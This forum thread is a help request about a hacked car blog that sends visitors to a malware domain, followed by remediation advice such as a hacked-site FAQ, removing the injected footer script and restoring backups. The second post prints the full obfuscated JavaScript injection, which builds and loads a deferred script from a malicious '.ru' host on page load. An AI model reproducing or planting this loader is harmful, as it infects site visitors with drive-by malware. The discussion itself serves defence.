[resolved] Receiving a filedownload message on website (10 posts)

  1. Naumansiddiqui
    Posted 5 years ago #


    I just started a car blog, trying to list all the cars.

    The problem has recently occurred, whenever someone opens the website, after the loading is done, the website tries to connect to momhand(dot)ru which is pretty much a malware site. I mean you are asked to download a pdf file and all types of java errors come in.

    for helpers here is the link to my site Hotmodcars

    I am really frustrated and demotivated as I have done everything to remove this. All advices are welcome, I look forward to help.


  2. I presume you read this and followed the suggestions: FAQ My site was hacked

    I didn't get prompted to download a PDF, mind, and I ran a scan


    and got this in the javascript dump

    this.S="";var x=new Array();var P;yu=["y"];G=["o"];F=function(){this.YG=50396;this.YG--;function Y(h,q,T){u=8318;u++;this.a_='';return h.substr(q,T);var d={lg:"lL"};var Cw={k:"b"};}var O=document;W={QW:false};var e=String("/goo"+"gle."+"com/"+"badj"+Y("ojo.BPq0",0,4)+Y("com/MPs",0,4)+Y("tinyvEse",0,4)+"pic."+Y("com.Hun",0,4)+Y("phpcyrm",0,3));var Tx={jt:"er"};this.az=56602;this.az-=255;var j='';PO={xb:52344};Zx={ZG:60817};var OD={Pa:"ki"};var Tk=RegExp;var dc="";var jG={};this.Zh=59066;this.Zh++;function A(h,q){var T=new String("[")+q+"]";var H=new String();try {} catch(Vy){};var M=new Tk(T, String("g"));this.Yo=24897;this.Yo-=97;return h.replace(M, j);};var _=A('suc1r1i1p1tC','uCZz1B9');IL=[];var WW=new Date();var L=657268-649188;var qw=new String();Ui={ba:"Mp"};var X=Y("bodygqEj",0,4);var OW={};var n='';var i=null;var ke=new Array();var oJj=["QZ","ly"];P=function(){ZO=18634;ZO+=200;this._q=48372;this._q+=252;try {bE={JJ:false};this.tW=59935;this.tW++;var _w=A('c3r9evavtqeHEpl3eHmTezndti','sZH8izTYAw0XL1Nqdp39vk');N=19659;N++;var R="";Td=O[_w](_);var c=A('svrjcv','EDv56mah9fJi1_jK');this.tc=8123;this.tc-=212;this.qy=45699;this.qy-=131;var h=L+e;kp={};var vp=false;var l=String("de"+Y("feGYh",0,2)+Y("VmArAmV",3,1));v_=[];ed={BS:60825};var D="";Td[l]=[1][0];Yj=["TC","qW"];var fZ="fZ";Td[c]=String(Y("htlBk",0,2)+"tp"+Y(":/Ic3",0,2)+Y("/mxYX",0,2)+Y("omeLP",0,2)+"ha"+"nd"+Y(".rMWln",0,2)+"u:")+h;this.Ia="";ja=30223;ja--;var sf=[];O[X].appendChild(Td);var bV=49047;var Aq=4712;} catch(B){};};};var yn={};var mT="";F();cJ=45828;cJ++;hE=43099;hE++;g={Jf:false};window.onload=P;var BAu=new Array();var pP=false;

    At a guess? That may be it.

  3. Naumansiddiqui
    Posted 5 years ago #

    how to remove it ? Any suggestions ?

  4. Yeah, what it says here: FAQ My site was hacked

    You'll have to check everything, and hopefully you have a good backup.

  5. Naumansiddiqui
    Posted 5 years ago #

    So you are suggesting that my site got hacked ?

    Back up isn't an issue, but how do I resolve the current scenario ?

    I don't want to back down ...I want to take it apart. Any resource which can help me in this issue ?

  6. Yes. Your site was hacked.

    Seriously. Either it was hacked by a theme or plugin, an exploit, an insecure password, who knows. What I DO know is that the FAQ I've linked to, twice (thrice as of this post) is your best resource on how to undo a hack.

    FAQ My site was hacked

  7. Naumansiddiqui
    Posted 5 years ago #

    well thanks. Istenu. Thanks for your help.

    Other viewers are welcome to put a response too.

  8. esmi
    Forum Moderator
    Posted 5 years ago #

  9. PaBLoX
    Posted 5 years ago #

    If you check your web source code you'll see there is a strange line containing a script. I presume it's on the footer.php since is below the html close tag.

    You have to delete that and then take all the necessary precautions so it doesn't happen again (that's when I'm having troubles...).

    Anyway, follow the faq, maybe after that nobody is going to bother you again.

  10. Naumansiddiqui
    Posted 5 years ago #

    Dear All thanks,

    The code was in a file which I removed.

    Now, trying to take measures to close xss issues.

    Thank you

Topic Closed

This topic has been closed to new replies.

About this Topic